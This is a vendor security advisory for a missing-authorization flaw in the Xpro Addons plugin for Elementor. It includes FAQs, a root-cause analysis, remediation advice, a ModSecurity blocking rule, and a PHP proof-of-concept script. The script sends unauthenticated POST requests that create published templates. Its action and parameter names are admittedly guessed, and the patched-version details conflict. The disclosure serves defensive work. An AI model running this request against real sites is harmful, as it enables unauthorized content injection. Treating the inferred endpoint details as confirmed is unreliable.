What is CVE-2025-15369?

CVE-2025-15369 is a vulnerability in the Xpro Addons plugin for Elementor, allowing unauthenticated users to create published Xpro templates due to a missing authorization check in the get_content_editor function.

How does this vulnerability work?

The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint without authentication, triggering the creation of a template. The lack of capability checks means that unauthorized users can publish content directly.

Who is affected by CVE-2025-15369?

Any WordPress site using the Xpro Addons plugin version 1.5.0 or earlier is affected. Administrators should check their plugin versions to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Xpro Addons plugin installed. If it is version 1.5.0 or earlier, your site is at risk and should be updated.

What is the recommended fix for this vulnerability?

The recommended fix is to update the Xpro Addons plugin to version 1.5.1 or later, which includes a capability check to prevent unauthorized template creation.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level. While there is no direct impact on confidentiality or availability, the ability for unauthorized users to create content poses a significant security risk.

What are the implications of successful exploitation?

Successful exploitation allows attackers to create arbitrary published templates, which can lead to stored XSS attacks or site defacement. While it does not lead to data theft, it can compromise site integrity.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a POST request to the WordPress AJAX endpoint, simulating the creation of a template without authentication. This illustrates the ease of exploiting the vulnerability.

What are AJAX handlers and why are they important?

AJAX handlers in WordPress allow asynchronous requests to the server. They are important because if not properly secured, they can expose sensitive functionality, as seen in this vulnerability.

What additional security measures should I consider?

In addition to updating the plugin, consider auditing other AJAX handlers for similar vulnerabilities, implementing security plugins, and regularly reviewing user permissions and capabilities.

Is there a way to mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the Xpro Addons plugin or restricting access to the AJAX endpoint through server configurations or firewall rules until the plugin can be updated.

What is the significance of the CWE-862 classification?

CWE-862 indicates a missing authorization check, highlighting that the vulnerability stems from inadequate security measures in the plugin’s code, specifically in its handling of user permissions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2025-15369: Xpro Addons — 140+ Widgets for Elementor <= 1.5.0 – Missing Authorization to Unauthenticated Xpro Template Creation (xpro-elementor-addons)

CVE ID CVE-2025-15369

Plugin xpro-elementor-addons

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.5.0

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15369 (metadata-based):

This vulnerability allows unauthenticated attackers to create published Xpro templates in the Xpro Addons plugin for Elementor. The plugin, which provides over 140 widgets for Elementor, suffers from a missing authorization check in its get_content_editor function. The CVSS score 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) confirms low impact with no confidentiality or availability compromise, but the ability to create published content without authentication is a significant security concern.

Root Cause: The CWE-862 Missing Authorization classification indicates the get_content_editor function lacks a capability check (e.g., current_user_can() or a nonce verification) before executing. Based on the description, this is inferred rather than code-confirmed. The function likely handles AJAX requests for creating or saving Xpro templates. Without checking if the user has proper WordPress permissions (like ‘edit_posts’ or ‘manage_options’), the plugin exposes a server-side action to unauthenticated users. The patched version 1.5.1 likely adds a capability check to this function.

Exploitation: An attacker can send a POST request to /wp-admin/admin-ajax.php with the action parameter set to the plugin’s AJAX hook (likely xpro_template_save or similar, inferred from the function name get_content_editor). The request likely includes parameters for the template content (e.g., ‘content’, ‘title’, or ‘post_data’). Since there is no authentication check, the server will process the request and create a published Xpro template. The attacker does not need any WordPress account or session.

Remediation: The fix should add a capability check before executing the template creation logic. In WordPress, this typically means using current_user_can(‘edit_posts’) or similar, along with a nonce verification (check_ajax_referer()). The plugin should also verify that the user has permission to create published content. Atomic Edge recommends that all similar AJAX handlers in the plugin are audited for missing authorization.

Impact: Successful exploitation allows an attacker to create arbitrary published Xpro templates on the WordPress site. While this does not directly lead to data theft or remote code execution, it can be used to inject malicious HTML or JavaScript into template content, leading to stored XSS attacks against site visitors or administrators. The attacker could also deface the site by creating unwanted templates that are displayed publicly. This is a low-to-medium severity issue that could be chained with other vulnerabilities for greater impact.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2025-15369 (metadata-based)
# Block unauthenticated Xpro template creation via AJAX
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2025-15369 - Xpro Addons missing authorization via AJAX',severity:'CRITICAL',tag:'CVE-2025-15369'"
SecRule ARGS_POST:action "@streq xpro_template_save" 
  "chain"
SecRule ARGS_POST:template_title "@rx ." 
  "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15369 - Xpro Addons — 140+ Widgets for Elementor <= 1.5.0 - Missing Authorization to Unauthenticated Xpro Template Creation

// Target WordPress site URL (change this to the vulnerable site)
$target_url = 'http://example.com';

// AJAX endpoint for WordPress
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// The action hook name is inferred: likely 'xpro_template_save' based on the plugin's common naming pattern
$action = 'xpro_template_save';

// Prepare the POST data for template creation
// The exact parameter names are inferred; common patterns include 'template_content', 'template_title', 'template_data'
$post_data = array(
    'action' => $action,
    'template_title' => 'Malicious Template - Created by Atomic Edge PoC',
    'template_content' => '<h2>This template was created without authentication!</h2>',
    'template_status' => 'publish',  // Attempt to publish immediately
    'nonce' => ''  // Note: Vulnerability means nonce is not required, but plugin may still check empty nonce
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output result
echo "[+] Target: " . $ajax_url . "n";
echo "[+] Action: " . $action . "n";
echo "[+] HTTP Response Code: " . $http_code . "n";
if ($http_code == 200) {
    echo "[+] Request succeeded. Check if a new Xpro template was created.n";
    echo "[+] Raw response:n";
    echo $response . "n";
} else {
    echo "[-] Request failed. The site may be patched or the action endpoint is different.n";
    echo "[-] Adjust the 'action' parameter based on actual plugin code.n";
}
?>

Frequently Asked Questions

What is CVE-2025-15369?
Overview of the vulnerability
CVE-2025-15369 is a vulnerability in the Xpro Addons plugin for Elementor, allowing unauthenticated users to create published Xpro templates due to a missing authorization check in the get_content_editor function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint without authentication, triggering the creation of a template. The lack of capability checks means that unauthorized users can publish content directly.
Who is affected by CVE-2025-15369?
Identifying vulnerable installations
Any WordPress site using the Xpro Addons plugin version 1.5.0 or earlier is affected. Administrators should check their plugin versions to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification
To check if your site is vulnerable, verify the version of the Xpro Addons plugin installed. If it is version 1.5.0 or earlier, your site is at risk and should be updated.
What is the recommended fix for this vulnerability?
Steps to remediate
The recommended fix is to update the Xpro Addons plugin to version 1.5.1 or later, which includes a capability check to prevent unauthorized template creation.
What does a CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity level. While there is no direct impact on confidentiality or availability, the ability for unauthorized users to create content poses a significant security risk.
What are the implications of successful exploitation?
Potential risks and consequences
Successful exploitation allows attackers to create arbitrary published templates, which can lead to stored XSS attacks or site defacement. While it does not lead to data theft, it can compromise site integrity.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of the issue
The proof of concept shows how an attacker can craft a POST request to the WordPress AJAX endpoint, simulating the creation of a template without authentication. This illustrates the ease of exploiting the vulnerability.
What are AJAX handlers and why are they important?
Understanding AJAX in WordPress
AJAX handlers in WordPress allow asynchronous requests to the server. They are important because if not properly secured, they can expose sensitive functionality, as seen in this vulnerability.
What additional security measures should I consider?
Beyond patching the vulnerability
In addition to updating the plugin, consider auditing other AJAX handlers for similar vulnerabilities, implementing security plugins, and regularly reviewing user permissions and capabilities.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary protective measures
If immediate updating is not possible, consider disabling the Xpro Addons plugin or restricting access to the AJAX endpoint through server configurations or firewall rules until the plugin can be updated.
What is the significance of the CWE-862 classification?
Understanding the root cause
CWE-862 indicates a missing authorization check, highlighting that the vulnerability stems from inadequate security measures in the plugin’s code, specifically in its handling of user permissions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations